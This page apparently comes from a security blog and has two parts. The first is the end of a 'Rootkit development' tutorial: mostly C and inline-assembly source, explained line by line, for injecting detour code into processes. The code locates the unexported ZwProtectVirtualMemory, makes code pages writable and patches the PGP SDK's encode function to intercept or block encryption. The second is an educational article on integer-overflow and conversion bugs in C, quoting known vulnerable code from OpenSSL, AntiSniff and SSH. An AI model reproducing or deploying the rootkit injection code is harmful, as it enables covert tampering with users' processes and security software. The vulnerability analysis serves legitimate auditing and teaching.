                        DWORD                      register_esp;

                        DWORD                      register_edi;

                        DWORD                      register_esi;

                        DWORD                      register_eax;

                        DWORD                      register_ebx;

                        DWORD                      register_ecx;

                        DWORD                      add2stack;

 

                        // setup to call injected functions

                        __asm

                        {

                                    mov register_esp, esp // this and following lines save the register values

                                    mov register_edi, edi

                                    mov register_esi, esi

                                    mov register_eax, eax

                                    mov register_ebx, ebx

                                    mov register_ecx, ecx

 

                                    // get parameters

                                    push edx // save edx because its value(the phoney_jump addres) is gonna be used more than once

                                    mov edx, [edx+CALLDATA_INDEX_LOCATION] //this is the address of the location which stores the INDEX parameter -- paased by process-inject -- . in fact it is the first 4 byte

                                    mov hookIndex, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_PARAMETERS_LOCATION] // location of parameters value --like index-- . the second 4 bytes

                                    mov parameters, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_CALLTYPE_LOCATION] // the call_type is either __declspec or other types

                                    mov callType, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_STACK_OFFSET_LOCATION]

                                    mov stackOffset, edx

                                    pop edx

                                    push edx

                                    add edx, TRAMPOLINE_LOCATION // this is 16 bytes after phoney_jump, the first nop instruction (0x90 opcode)

                                    mov trampolineFunction, edx

                                    pop edx

                                    // caculate the start address

                                    xor eax, eax // zeros the eax register

                                    call called_without_return // like call to phoney_call to get the address on top of the stack

called_without_return:

                                    pop eax // address of the called_without_return is now in eax

                                    lea ebx, DetourFunction

                                    lea ecx, called_without_return

                                    sub ecx, ebx

                                    sub eax, ecx // in fact now eax has the value (called_without_return real address) - (called_without_return - DetourFunction) which is Detour Function

                                    mov codeStart, eax //codeStart points to detour_function start

                                    // data area

                                    lea ecx, EndOfInjectedCode

                                    sub ecx, ebx // ecx contains EndOfInjectedCode - DetourFunction

                                    add ecx, eax //End of EndOfInjectedCode address

                                    mov callData, ecx // callData now contains address of IN_PROCESS_DATA (In allocateUserMemory we allocated IN_PROCESS_DATA after HookTable(tableSize) and Detour Function(codeSize))

                                    // caculate the last ret address

                                    mov eax, ebp // ebp by PUSH_STACKFRAME macro got the original esp - 4 (subtracted by 4 because the ebp before storing esp was pushed)

                                    add eax, 4        // adding 4 means in fact pop (because x86 stack grows down) and now eax has the original esp

                                    add eax, stackOffset

                                    mov originalStack, eax // will be used to read parameters

                        }

 

                        // setup return call type

                        if( callType == CDECL_TYPE )

                                    add2stack = parameters * sizeof( DWORD ); // because the parameters are on top of stack

                        else

                                    add2stack = 0; // parameters are in registers not on stack

                        // call pre-injected code

                        continueFlag = BeforeOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); //this function checks the function to be hooked and call right function in this case the before_encode

                        if( continueFlag == (DWORD)TRUE ) // !continueFlag means not interested in running the original hooked function but this is what actually happening

                        {

                                    for( loop = parameters; loop > 0; loop-- ) // this "for" aims to construct the parameters again on top of the stack: the parameters are after return address so it should read originalStack[1] and originalStack[2]

                                    {

                                                tempStack = originalStack[loop];

                                                __asm push tempStack

                                    }

                                    // Call trampoline (jumps to original function)

                                    //

                                    // Since trampoline is a jump, the return in

                                    // the original function will come back here.

                                    __asm

                                    {

                                                lea ebx, DetourFunction

                                                lea eax, return_from_trampoline

                                                sub eax, ebx

                                                add eax, codeStart // the address of return address which is return_from_trampoline now is on top of the stack

                                                // construct call

                                                push eax

                                                // adjust stack

                                                sub esp, stackOffset // actually nothing changes since the stackOffset is 0

                                                // restore registers and call

                                                mov edi, register_edi

                                                mov esi, register_esi

                                                mov eax, register_eax

                                                mov ebx, register_ebx

                                                mov ecx, register_ecx

                                                jmp trampolineFunction // now returning to the hooked function(by executing the first instruction and a jmp to the 2nd instruction) and after that the function goes back to next line since its address is on top of the stack

return_from_trampoline:

                                                add esp, add2stack //parameters which put on the stack now are poped

                                                mov parameter2return, eax //return value in parameter2return

                                    }

                                    // call post-injected code

                                    AfterOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); //Do nothing for now, just to show the concept

                        }

                        // prepare to return

                        tempStack = *originalStack;

                        if( callType == CDECL_TYPE )

                                    parameters4return = 0; //

                        else

                                    parameters4return = parameters; // in case of multiple return value

                        __asm

                        {

                                    mov eax, parameter2return

                                    mov ecx, tempStack // on top of the original stack the return address to the caller function stored so no cx contain the return address

                                    mov edx, parameters4return

                                    shl edx, 2 // multiply by 4, size of a DWORD

                                    add edx, stackOffset

                                    POP_STACKFRAME(); // original stack

                                    add esp, 4 // the return address is now poped

                                    add esp, edx //stack is clear if callee should clean the stack ( !CDECL_TYPE )

                                    jmp ecx // jump to return address

                        }

                        __asm mov edx, trampolineFunction // i think it is junk

            }

            POP_STACKFRAME(); // i think it is junk

            __asm jmp edx // i think it is junk

}

 

What we do, should not interrupt the following execution mechanism so we should first save the registers and then restore their values. That is what happens in line 9. In line 77 to 105 we retrieve the passed parameters from kernel using the initialized address at HookTable. We also set the returned address from DetourFunction (the address we should return after doing our dirty work!) in line 109 to 115 by setting tramploineFunction variable. While executing our custom code we may need the parameters to the original hooked function. Parameters are on top of stack and we can access the stack because the execution control comes to our trampoline function by a jmp so stack is the same. In line 119 to 155 we setup the stack container variable to point to the original stack and the callData which contains references to the kernel library functions. After that we execute our custom code before execution of the hooked function in line 173. To execute a piece of code after the original hooked function we do much like what we do when exploiting a buffer overflow i.e. we place an EIP on the stack pointing to the post-hook function. In line 201 to 215 we place the address of our custom code to be run after the execution of hooked function on top of the stack. Afterwards we jump to the saved address in tramploineFunction in line 229 which is the first instruction of hooked function (after that instruction there is a jump back to the hooked function). After executing the original function the control flow transfers to the line 232 that depending on the implementation it appropriately clean the stack , place the parameter where the caller looks for it and etc

The execution flow after hooking the desired function is as in figure 4:

Rootkit source code execution flow 

Figure 4

In your injected code you can do pretty much everything as long as you copy the required library and API functions to the process’s memory. But here in our BeforeOriginalFunction we process the buffer before encryption and also return a value that based on that we decide to run the original hooked function or not:

///////////////////////////////////////////////////////////////

DWORD BeforeOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

                if( hookIndex == USERHOOK_beforeEncode )

                {

                                return beforeEncode( originalStack, returnParameter, callData );

                }

                // can other hooks be here

                return (DWORD)TRUE;

}

 

// this function is located in the PGP SDK

// dynamic link library (old=PGP_SDK.DLL, new=PGPsdk.dll)

// This function accepts the callers input and output,

// which may be memory or file based, and converts the input

// into encrypted output

//

// return TRUE to allow encryption

// return FALSE to block encryption

///////////////////////////////////////////////////////////////

DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData )

{

                void*                                                                     contextPtr = (void*)stack[1]; // stack[0] is return address so the stack[1] is first parameter

                PGPOptionList*                                                optionListPtr = (PGPOptionList*)stack[2]; // second parameter of original Encode function

                DWORD                                                                                dwRet = (DWORD)TRUE;

 

                int index;

                int inputType = 0;

                void* lpBuffer;

                DWORD dwInBufferLen = 0;

                PGPOption* currentOption = optionListPtr->options;

                PFLFileSpec* fileSpec;

 

                // Look at the options in the option list

                for( index = 0; index < optionListPtr->numOptions; index++)

                {

                                if( currentOption->type == 1 )

                                {

                                                // File Input

                                                inputType = 1;

                                                fileSpec = (PFLFileSpec*)currentOption->value;

                                                lpBuffer = fileSpec->data;

                                                dwInBufferLen = (DWORD)pCallData->plstrlenA((LPCSTR)(lpBuffer)); //pCallData is just a structure passed by detour and the structure is defined in data section by process-inject

                                                break;

                                }

                                else if( currentOption->type == 2 )

                                {

                                                // Buffer Input

                                                inputType = 2;

                                                lpBuffer = (void*)currentOption->value;

                                                dwInBufferLen = (DWORD)currentOption->valueSize;

                                                break;

                                }

                                currentOption++;

                }

 

                // Process buffer or file before encryption -- for now do nothing --

                if(( inputType == 1 || inputType == 2 ) && ( dwInBufferLen > 0 ))

                {                                             

                                // just blocking this API to show functionality

                                dwRet = (DWORD)FALSE;

                                *callbackReturn = PGP_BAD_API;

                }

                return dwRet;

}

 

After OriginalFunction does nothing except showing the functionality that you can place codes after the hooked function:

void AfterOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

}

 

Ok now that you have understood what happens after hooking, it is time to see how we place the hook. We need to:

  • Copy our custom code (HookTable, References to the kernel library functions, DetourFunction and etc.) to the Process’s memory
  • Injecting the opcode + ‘begining of our injected code in PROCESS’s memory’ by modifying the first instruction of the hooked function
  • Copy that first instruction in the HookTable and place a jump after it back to the second instruction of original hooked function
  • Copy the parameters, passed from hooked zwMapViewOfSection, to the HookTable

Copying the first instruction may seem simple but in fact it is not! To understand the issue you should be familiar with X86 instruction set. Opcodes are not same length and depending on the opcode you should copy following bytes (for example source and destination address for the Mov instruction). I skip the details of transferInstruction function which does the low-level works but if you’re interested you can download the source codes from the mentioned address and see file Parse86.h. For now just the high level function get86Instruction:

ULONG getx86Instruction( PCHAR originalCode, PCHAR instructionBuffer, ULONG bufferLength ) //This function is supposed to return one instruction

{

                PBYTE source = NULL;

                PBYTE destination = NULL;

                ULONG ulCopied = 0;

                PBYTE jumpAddress = NULL;

                LONG  extra = 0;

 

                memset( instructionBuffer, 0, bufferLength );

                source = (PBYTE)originalCode;

                destination = (PBYTE)instructionBuffer;

                jumpAddress = NULL;

                extra = 0;

                // start with 5 bytes

                for( ulCopied = 0; ulCopied < 5; ) //5 because a jmp can be 5 bytes, it may copy 2 instruction

                {

                                source = transferInstruction( destination, source, &jumpAddress, &extra ); //this funcion checks the type of operation opcode and copy one whole instruction in destination and returns source + num of bytes copied. it also sets jump address in case of jump but it will not be used so we can say jumpAddress, extra are useless

                                if( !source )

                                {

                                                memset( instructionBuffer, 0, bufferLength );

                                                ulCopied = 0;

                                                break;

                                }

                                ulCopied = (DWORD)source - (DWORD)originalCode; //This line insures that never more than two instructions are copied

                                if( ulCopied >= bufferLength )

                                {

                                                ASSERT( FALSE );

                                                break;

                                }

                                destination = (PBYTE)instructionBuffer + ulCopied;

                }

                return ulCopied;

}

 

Changing the first instruction of the original function is not easy also, because the memory containing that instruction is write-protected and we should use the ZwProtectVirtualMemory kernel undocumented function which make a portion of memory writable. Using a documented function ZwPulseEvent we look for ZwProtectVirtualMemory and then use it to make the original function writable:

ZwProtectVirtualMemory(

  IN HANDLE               ProcessHandle,

  IN OUT PVOID            *BaseAddress,

  IN OUT PULONG           NumberOfBytesToProtect,

  IN ULONG                NewAccessProtection,

  OUT PULONG              OldAccessProtection );

ZWPROTECTVIRTUALMEMORY OldZwProtectVirtualMemory;

…

OldZwProtectVirtualMemory = findUnresolved(ZwPulseEvent);

…

PVOID findUnresolved( PVOID pFunc )

{

                UCHAR pattern[5] = { 0 };

                PUCHAR               bytePtr = NULL;

                PULONG  oldStart = 0;

                ULONG newStart = 0;

 

                memcpy( pattern, pFunc, 5 ); // copy first 5 bytes of function ZwPulseEvent

 

                // subtract offset

                oldStart = (PULONG)&(pattern[1]);

                newStart = *oldStart - 1; // change value of second byte by decresing it to one (probably this 5 byte of ZwProtectVirtualMemory is similar to ZwPulseEvent except the second byte)

                *oldStart = newStart;

 

                // Search for pattern

                for( bytePtr = (PUCHAR)pFunc - 5; bytePtr >= (PUCHAR)pFunc - 0x800; bytePtr-- ) //search backward from ZwPulseEvent to 2KB=0x800 before it

                                if( checkPattern( bytePtr, pattern, 5 ) == 0 ) // it simply checks the pattern from bytePtr to next 5 bytes, and since it slowly goes down it checks all possible 5 bytes from ZwPulseEvent to 2KB=0x800 before it

                                                return (PVOID)bytePtr;

                // pattern not found

                return NULL;

}

BOOL makeWritable( PVOID address, ULONG size )

{

    NTSTATUS       status;

                ULONG                 pageAccess;

                ULONG                 ZwProtectArray[3] = { 0 };

 

                pageAccess = PAGE_EXECUTE_READWRITE;

                ZwProtectArray[0] = (ULONG)address; // address of function to make it writable, this is important because we need to temper the hooked function and also hooktable

                ZwProtectArray[1] = size;

                ZwProtectArray[2] = 0;

 

                status = OldZwProtectVirtualMemory( (HANDLE)-1, //although this function is not exported, we found its address in memory and defined its prototype so now we can use it

                                                                                                                                                                (PVOID *)(&(ZwProtectArray[0])),

                                                                                                                                                                &(ZwProtectArray[1]), // this parameter is in

                                                                                                                                                                pageAccess, //PAGE_EXECUTE_READWRITE

                                                                                                                                                                &(ZwProtectArray[2]) ); // this parameter is out

 

                if( !NT_SUCCESS( status ) )

                                return FALSE;

 

                return TRUE;

}

 

Now that we have all the tools we need, see the processInject code:

BOOL processInject( CALL_DATA_STRUCT* pCallData, int hooks, PCHAR pMemory )

{

                int           loop;

                int           offsetToPattern;

                PCHAR pNewTable;

                PCHAR pNewCode;

                IN_PROCESS_DATA* pNewData;

                PCHAR pOldTable;

                PCHAR pOldCode;

                PCHAR pOldData;

                DWORD tableLength;

                DWORD tableOffset;

                PCHAR callDataOffset;

 

                if( !kernel32Base )

                                return FALSE;

 

                if( !getHookPointers( pMemory, &pNewTable, &pNewCode, (PCHAR*)&pNewData ) )

                                return FALSE;

// To call library functions we need, we should map their addresses because these are not supposed to be present in the caller process. We use GetFunctionAddress(Remember that we now setup hooking so we have access to this and other defined functions) to locate library functions and put them in the IN_PROCESS_DATA structure

                pNewData->pOutputDebugStringA = (PROTOTYPE_OutputDebugStringA)GetFunctionAddress( kernel32Base, "OutputDebugStringA", NULL, 0 );

                pNewData->pOutputDebugStringW = (PROTOTYPE_OutputDebugStringW)GetFunctionAddress( kernel32Base, "OutputDebugStringW", NULL, 0 );

                pNewData->pCloseHandle = (PROTOTYPE_CloseHandle)GetFunctionAddress( kernel32Base, "CloseHandle", NULL, 0 );

                pNewData->pSleep = (PROTOTYPE_Sleep)GetFunctionAddress( kernel32Base, "Sleep", NULL, 0 );

                pNewData->pCreateFileW = (PROTOTYPE_CreateFileW)GetFunctionAddress( kernel32Base, "CreateFileW", NULL, 0 );

                pNewData->plstrlenA = (PROTOTYPE_lstrlenA)GetFunctionAddress( kernel32Base, "lstrlenA", NULL, 0 );

                pNewData->plstrlenW = (PROTOTYPE_lstrlenW)GetFunctionAddress( kernel32Base, "lstrlenW", NULL, 0 );

                pNewData->plstrcpynA = (PROTOTYPE_lstrcpynA)GetFunctionAddress( kernel32Base, "lstrcpynA", NULL, 0 );

                pNewData->plstrcpynW = (PROTOTYPE_lstrcpynW)GetFunctionAddress( kernel32Base, "lstrcpynW", NULL, 0 );

                pNewData->plstrcpyA = (PROTOTYPE_lstrcpyA)GetFunctionAddress( kernel32Base, "lstrcpyA", NULL, 0 );

                pNewData->plstrcpyW = (PROTOTYPE_lstrcpyW)GetFunctionAddress( kernel32Base, "lstrcpyW", NULL, 0 );

                pNewData->plstrcmpiA = (PROTOTYPE_lstrcmpiA)GetFunctionAddress( kernel32Base, "lstrcmpiA", NULL, 0 );

                pNewData->plstrcmpiW = (PROTOTYPE_lstrcmpiW)GetFunctionAddress( kernel32Base, "lstrcmpiW", NULL, 0 );

                pNewData->plstrcmpA = (PROTOTYPE_lstrcmpA)GetFunctionAddress( kernel32Base, "lstrcmpA", NULL, 0 );

                pNewData->plstrcmpW = (PROTOTYPE_lstrcmpW)GetFunctionAddress( kernel32Base, "lstrcmpW", NULL, 0 );

                pNewData->plstrcatA = (PROTOTYPE_lstrcatA)GetFunctionAddress( kernel32Base, "lstrcatA", NULL, 0 );

                pNewData->plstrcatW = (PROTOTYPE_lstrcatW)GetFunctionAddress( kernel32Base, "lstrcatW", NULL, 0 );

                sprintf( pNewData->debugString, "This is a string contained in injected memory\n" );

 

                __asm

                {

                                lea eax, HookTable

                                mov pOldTable, eax

                                lea eax, DetourFunction

                                mov pOldCode, eax

                                lea eax, EndOfInjectedCode

                                mov pOldData, eax

                }

 

                memcpy( pNewCode, pOldCode, pOldData - pOldCode ); //write detuor function in the code section of memory allocated in the process space

                tableLength = pOldCode - pOldTable;

                for( loop = 0; loop < (int)tableLength - 4; loop ++ )

                {

                                if( *(PDWORD)(pOldTable+loop) == (DWORD)START_OF_TRAMPOLINE_PATTERN ) // search to find -1. in fact -1 is the first byte after phoney_jump in HookTable

                                {

                                                offsetToPattern = loop; // offset to phoney_jump

                                                break;

                                }

                }

                for( loop = 0; loop < hooks; loop ++ ) // for now it is just one hook, but as you can see this function can place several hooks for different functions

                {

                                tableOffset = tableLength * pCallData[loop].index; // according to potential of several hooks, it calculates table of current hook. for now it is just one table and actually is 0

                                callDataOffset =  pNewTable + tableOffset + offsetToPattern; //address of phoney_jump

                                memcpy( pNewTable + tableOffset, pOldTable, tableLength ); // write HookTable in table section of memory allocated in the process space

                                *((PDWORD)(callDataOffset + CALLDATA_INDEX_LOCATION)) = pCallData[loop].index; //in first 4 byte(on -1) it writes the index of hook for example USERHOOK_beforeEncode

                                *((PDWORD)(callDataOffset + CALLDATA_PARAMETERS_LOCATION)) = pCallData[loop].parameters;// in second 4 byte (actually 4 byte after phoney_jump) it writes number of parameters of original function

                                *((PDWORD)(callDataOffset + CALLDATA_CALLTYPE_LOCATION)) = pCallData[loop].callType; // in byte 8 to 12 it writes calltype like CDECL_TYPE

                                *((PDWORD)(callDataOffset + CALLDATA_STACK_OFFSET_LOCATION)) = pCallData[loop].stackOffset; // byte 12 to 16

                                INJECT_JUMP( callDataOffset + JUMP_TO_DETOUR_LOCATION, pNewCode ); // it modifies the jmp DetourFunction instruction before the -1 in HookTable so it points to the CALLER PROCESS's detour function (which is just copied)! note: the jmp instruction is 5 byte!

                                createTrampoline( pCallData[loop].hookFunction, // address of hooked function

                                                pNewTable + tableOffset, //Beginning of HookTable

                                                callDataOffset + TRAMPOLINE_LOCATION); // actually in first no-op of HookTable

                }

                return TRUE;

}

// Parse first instruction of original function.

// Replace first instruction with jump to hook.

// Save first instruction to trampoline function.

// Only call original function through trampoline.

BOOL isJump( PCHAR instruction, ULONG instructionLength )

{

                BYTE firstByte;

                BYTE secondByte;

                PCHAR thisInstruction;

                ULONG thisInstructionLength;

                ULONG nextInstructionLength;

                char instructionBuffer[MAX_INSTRUCTION] = { 0 };

 

                thisInstruction = instruction;

                thisInstructionLength = instructionLength;

                while( thisInstructionLength > 0 ) // because of the 5 bytes limits in get86Instruction it may have more than one instruction

                {

                                // check all jump op codes

                                firstByte = thisInstruction[0];

                                secondByte = thisInstruction[1];

                                if( IS_BETWEEN( firstByte, 0x70, 0x7f ) ) //this and following next lines checks all types of jump

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xca, 0xcb ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe0, 0xe3 ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe8, 0xeb ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xcf ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xf3 ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xff ) )

                                {

                                                if( secondByte == 0x15 || secondByte == 0x25 )

                                                                return TRUE;

                                                if( (secondByte & 0x38) == 0x10 || (secondByte & 0x38) == 0x18 ||

                                                                (secondByte & 0x38) == 0x20 || (secondByte & 0x38) == 0x28 )

                                                                return TRUE;

                                }

                                else if( IS_EQUAL( firstByte, 0x0f ) )

                                {

                                                if( IS_BETWEEN( secondByte, 0x80, 0x8f ) )

                                                                return TRUE;

                                }

                                memset( instructionBuffer, 0, sizeof(instructionBuffer) );

                                nextInstructionLength = getNextInstruction( thisInstruction, 1, instructionBuffer, MAX_INSTRUCTION );

                                if( nextInstructionLength <= 0 )

                                                break;

                                thisInstructionLength -= nextInstructionLength;

                                thisInstruction += nextInstructionLength;

                }

                return FALSE;

}

#define INJECT_JUMP( from, to ) { ((PCHAR)from)[0] = (CHAR)0xe9; *((DWORD *)&(((PCHAR)(from))[1])) = (PCHAR)(to) - (PCHAR)(from) - 5; } // - 5 is because of size of jump instruction(see it as to -(from + 5)) since for jmp we must calculate bytes after the instuction itself

BOOL createTrampoline( PCHAR originalAddress, PCHAR tableAddress, PCHAR trampolineAddress )

{

                ULONG                 newOriginalAddress = 0;

                char                       instruction[MAX_INSTRUCTION] = { 0 }; //MAX_INSTRUCTION is 36

                ULONG                 instructionLength;

 

                instructionLength = getx86Instruction( originalAddress, instruction, sizeof(instruction) );

                newOriginalAddress = (ULONG)(originalAddress + instructionLength);

                // see if it's a jump

                if( isJump( instruction, instructionLength ) ) //here all types of jump will be examined

                {

                                PVOID pOldDstAddr = (PVOID)(GET_JUMP( instruction )); // but here just 0xe9 jump is acceptable and in case of other jumps 0 is returned and createTrampoline function returns false since cases like call can not be handled in our detour function

                                if( pOldDstAddr )

                                {

                                                // If first instruction of original function

                                                // is a jump, trampoline instruction is NO-OP

                                                // and jump target is original jump target

                                                memset( instruction, 0x90, sizeof(instruction) );

                                                instructionLength = 0;

                                                newOriginalAddress = (ULONG)pOldDstAddr; //Keeping track of jump address for return(after executing first instruction and do our evil things)

                                }

                                else

                                {

                                                return FALSE;

                                }

                } // up to here we have done 2 jobs. first we have found the instruction ( instruction variable ) to be placed in HookTable phoney_call place ( either the first instruction of original function or the no-op instruction ) and second we found the address (newOriginalAddress variable) to return after our beforeEncode function ( either address after the first instruction or in case of jump the address of jump)

                if( makeWritable( (PVOID)trampolineAddress, MAX_INSTRUCTION + 5 ) ) // this function make writing accessibe with an un-exported function

                {

                                // write trampoline function

                                memset( trampolineAddress, 0x90, MAX_INSTRUCTION + 5 ); // +5 is because the jmp EndOfInjectedCode, this jump is useles since we go to the EndOfInjectedCode by pushing the address on top of the stack. so it can be replaced by no-op

                                memcpy( trampolineAddress, instruction, instructionLength ); // set the first instruction of original function in the HookTable

                                INJECT_JUMP( trampolineAddress + instructionLength, newOriginalAddress ); //set the jmp to the original function in the HookTable

                                // set original function to jump to trampoline function

                                if( makeWritable( originalAddress, instructionLength + 5 ) ) //to be cautious we make 5 bytes more writable

                                {

                                                INJECT_JUMP( originalAddress, tableAddress ); //here we inject jmp to our HookTable address in original function

                                                return TRUE;

                                }

                }

                return FALSE;

}

After retrieving addresses of codes in calling process by getHookPointers in line 35 we start writing references to the required kernel library functions in line 40 to 73 (remember we can't just call these functions because we don't know if there are references to these functions in the calling process). In line 83 to 93 we get the addresses of injected codes to be copied in OUR code (the rootkit) to copy them in their destinations in the calling process. In line 103 to 143 we write the parameters from the hooked kernel(parameters to adjust the stack from hooked ZwMapViewOfSection), original function's first instruction and the jump back to the second instruction in the HookTable considering the fact that there may be multiple functions to be hooked.

Published in Rootkit development

integer overflow c | buffer overflow in c | buffer overflow example

C grants the developer full control over the memory management and because of this buffer overflow scenarios are very common. Either it is the usage of unsafe methods or developer’s mistakes to calculate the length of a buffer, the damage will be the same. Most of buffer overflow vulnerabilities are related to the wrong calculation of a buffer length or an offset. These issues are attributed to the C’s Integer characteristics which remain hidden to the developers. A professional code auditor should be able to detect such logic and sometimes complex vulnerabilities. In this article first I am going to talk about root causes of buffer overflows (mainly related to integers) and then provide several source code examples.

Most of novice hackers are familiar with the term buffer overflow. However a naïve viewpoint is that, developers’ usage of unsafe methods such as strcpy is the main cause for such vulnerabilities. Well maybe 15 years ago this perspective was right but over time codes have become more secure and hackers found new ways to leverage a bug! In recent years a great number of vulnerabilities were logic and complex vulnerabilities related to integer overflows, integer boundary issues and integer conversions. These issues were vulnerabilities because they explicitly cause a buffer overflow.

After you review the vulnerabilities I introduce in this article you probably know how an attacker leverage an integer issue such as an integer overflow but if you look for some preconditions here are a couple of conditions that may lead to a vulnerability:

  • Either a dynamic allocation(from the heap using malloc) or a reserved amount allocation(from the stack using variable definition) is performed
  • An input which is controllable from user is going to be read into the buffer
  • A calculation for the amount of the buffer to be allocated or size of the data to be copied is being performed (either using a length variable from the user or an implicit code to do so)

The real issue is the number passing for the copy operation (for example input to the memset) being bigger than the size of the buffer or sometimes the malloc’s size argument being lesser than the real value. The first two mentioned conditions are common between all memory management modules and you should have spotted them in your pre-assessment phase. Out of all memory management modules those which have the 3td condition are better to start with because they are likely to have integer overflow issues. For example a simple length +1 addition is all that may cause an buffer overflow.

Integer overflow c

An integer overflow either leads to a negative number or to a much smaller number. Integer overflows by themselves are not vulnerability but most of time they result in a buffer overflow because the calculation for buffer allocation becomes incorrect. For the first example let’s examine an OpenSSL 0.9.6l buffer overflow example (The code is taken from The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities book) because of a simple addition:

The Art of Software Security Assessment (Listing 6-6)

 

c.inf=ASN1_get_object(&(c.p),&(c.slen),&(c.tag),&(c.xclass),

                      len-off);

 

...

{

    /* suck in c.slen bytes of data */

    want=(int)c.slen;

    if (want > (len-off))

    {

        want-=(len-off);

        if (!BUF_MEM_grow(b,len+want))

        {

            ASN1err(ASN1_F_ASN1_D2I_BIO,

                    ERR_R_MALLOC_FAILURE);

            goto err;

        }

        i=BIO_read(in,&(b->data[len]),want);

 

To see the vulnerability consider c.slen to be 2147483647, len= 200(number of bytes already read), off=50(the number of bytes that are parsed). The first If statement passes because (2147483647>150) and the Grow-Buffer at line 21 does not grow the buffer because the len+want=-2147483449 and the last line writes 2147483647 bytes into in buffer! 

Although a simple addition of two big numbers can cause an integer overflow, addition is not the only cause; a multiplication is another source to cause integer overflow. In C for dynamic allocation malloc function is used. This function needs the number of bytes to be allocated as a parameter. To calculate the size, developers use:

bufferSize = length * [Type’s size]

If all of the variables are of type int32 and the user is able to specify a large length value, this multiplication can cause an integer overflow. Consider a network packet that contains a header field to indicate the length parameter. If the user specifies 1073741825 for this length value, on a 32 bit system that the type is int32 and 4 bytes, this multiplication leads to an integer overflow. This integer probably leads to a buffer overflow vulnerability because the bufferSize is 4 and malloc allocates 4 bytes. But the packet reader reads length parameter which leads to writing 1073741825 (4 bytes) after the 4th byte of the buffer! A huge buffer over flow!

Integer Conversion issues

A conversion between types can be either result of an explicit conversion or an implicit compiler conversion hidden from developer’s eyes. Explicit conversion vulnerabilities are mainly the result of the assignment of a smaller signed integer (short type) to an unsigned int. In this scenario a negative number such as -1 can become the biggest unsigned int! In these scenarios the memory is very small than the write operation. Another common explicit conversion is the conversion of an unsigned integer to its sign type. In this case a big number becomes a small negative number and probably bypass the following boundary length check. Implicit conversions mostly happen during operations; in fact every smaller type than int and unsigned int become int in arithmetic operations! A typical issue is when an integer value and an unsigned int are in an arithmatic operation. In this case the integer automatically is converted to an unsigned int! This is exactly why safe methods such as snprintf(), strncpy(), memcpy(), read(), or strncat() cannot be safe at all at certain situations. These functions accept an unsigned int as the “n” parameter to copy and passing a negative number ends up becoming a very large positive number.

Always remember that char and short types can be negative so passing these types as the parameter to the methods working with size_t can lead to a potential vulnerability. Look at a buffer overflow example in AntiSniff tool vulnerability from packetstormssecurity:

The Art of Software Security Assessment (adopted from listing 6-8)
  char *indx;
  unsigned int count;
  char nameStr[MAX_LEN]; //256
...
  memset(nameStr, '\0', sizeof(nameStr));
...
  indx = (char *)(pkt + rr_offset);
  count = (char)*indx;

  while (count){
    if (strlen(nameStr) + count < ( MAX_LEN - 1) ){
      (char *)indx++;
      strncat(nameStr, (char *)indx, count);
      indx += count;
      count = (char)*indx;
      strncat(nameStr, ".",
              sizeof(nameStr)  strlen(nameStr));
    } else {
      fprintf(stderr, "Alert! Someone is attempting "
                      "to send LONG DNS packets\n");
      count = 0;
    }

 }
 nameStr[strlen(nameStr)-1] = '\0';

 

When there is a conversion from the same-length unsigned type to the sign, there is a fat chance that an integer overflow vulnerability exists. In this case the large lengths are seen as a sign integer after the conversion and the following boundary checking is easily bypassed. It is worth to mention that many of these buffer overflow issues can be identified easier by a fuzz testing than by a source code analysis. For example let’s examine following piece of code:count is unsigned int which is correct, indx is used  to read characters including the count of next block. Indx is a char type and it makes sense, right? Well it doesn’t make sense since a char is signed and one can pass -1 as length. The -1 then will be converted (by dereferencing indx in line 7) to the hugest 32 bit integer and it passed the while condition. Then the if-statement at line 11 is going to prevent a buffer overflow attacks but since a small number (strlen(nameStr)) is added to a big integer (count) an integer overflow takes place and the result is less than MAX_LEN and the control flow goes to the copy statement in line 13. Here the big count number is passed as length argument and a buffer overflow happens. The If-Statement is an enhancement to the previous vulnerable version that there was no protection mechanism at all. But as you see the real problem is the conversion of a signed byte to an unsigned integer. Making both namestr and indx variables unsigned fix the problem of this buffer overflow example.

The Art of Software Security Assessment (Listing 6-12)

 

unsigned short read_length(int sockfd)

{

    unsigned short len;

 

    if(full_read(sockfd, (void *)&len, 2) != 2)

        die("could not read length!\n");

 

    return ntohs(len);

}

 

int read_packet(int sockfd)

{

    struct header hdr;

    short length;

    char *buffer;

 

    length = read_length(sockfd);

 

    if(length > 1024){

        error("read_packet: length too large: %d\n", length);

        return 1;

    }

 

    buffer = (char *)malloc(length+1);

    if((n = read(sockfd, buffer, length) < 0){

        error("read: %m");

        free(buffer);

        return 1;

    }

 

    buffer[n] = '\0';

 

    return 0;

}

 

In line 33 a simple conversion from unsigned short (result of read_length) to the signed short makes a big number like 65535 negative (-1) and therefor the length > 1024 check is bypassed. After that the malloc function surprisingly allocates 0 byte because the addition makes an integer overflow and the parameter of malloc becomes 0. 

While auditing it is important not to be misled by a complex algorithm and then leave it. One of the approaches to overcome the complexity is to look over a source code several times, and following just one goal in each iteration. To find integer conversion issues you should pay attention to variable definitions and the following assignment for each variable. If you find an assignment that the right side’s type is different than the left side then you should check different test cases. Let’s examine an integer overflow example from a vulnerability in SSH:

The Art of Software Security Assessment (adopted from listing 6-19)
/* Detect a crc32 compensation attack on a packet */
int
detect_attack(unsigned char *buf, u_int32_t len,
              unsigned char *IV)
{
    static u_int16_t *h = (u_int16_t *) NULL;
    static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
    register u_int32_t i, j;
    u_int32_t l;
    register unsigned char *c;
    unsigned char *d;

    if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
